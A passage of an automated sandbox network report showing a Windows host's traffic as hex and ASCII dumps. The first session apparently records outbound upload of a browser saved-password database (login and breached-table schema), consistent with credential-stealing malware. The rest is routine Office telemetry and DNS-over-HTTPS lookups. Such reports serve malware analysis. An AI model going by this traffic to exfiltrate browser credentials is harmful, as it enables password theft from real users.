                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                      Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                      Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                      2024-11-30 21:38:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:45 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      105192.168.2.104986613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:44 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                      x-ms-request-id: 1cfa5ca7-601e-000d-64b2-422618000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213844Z-174f78459684bddphC1EWRbht400000011qg00000000brhd
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      106192.168.2.1049872162.159.61.34432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:44 GMT
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      CF-RAY: 8eadfc74c9324304-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 b5 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomPc)


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      107192.168.2.1049873172.64.41.34432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:44 GMT
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      CF-RAY: 8eadfc74d90741d5-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 23 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom#()


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      108192.168.2.104986913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:44 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 405
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                      x-ms-request-id: 64c010c7-b01e-003e-2ea1-428e41000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213844Z-174f7845968zgtf6hC1EWRqd8s0000000uug00000000n69q
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      109192.168.2.1049874172.64.41.34432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:44 GMT
                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      CF-RAY: 8eadfc75a9f618fa-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 05 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      110192.168.2.104987013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:45 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                      x-ms-request-id: e27289f3-201e-0003-0c15-42f85a000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213845Z-174f784596886s2bhC1EWR743w00000012200000000082ba
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:45 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      111192.168.2.104987113.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:45 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 174
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                      x-ms-request-id: 058c760e-201e-0051-7c6f-407340000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213845Z-174f78459685726chC1EWRsnbg000000125g000000000578
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:45 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      112192.168.2.104988020.190.147.7443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
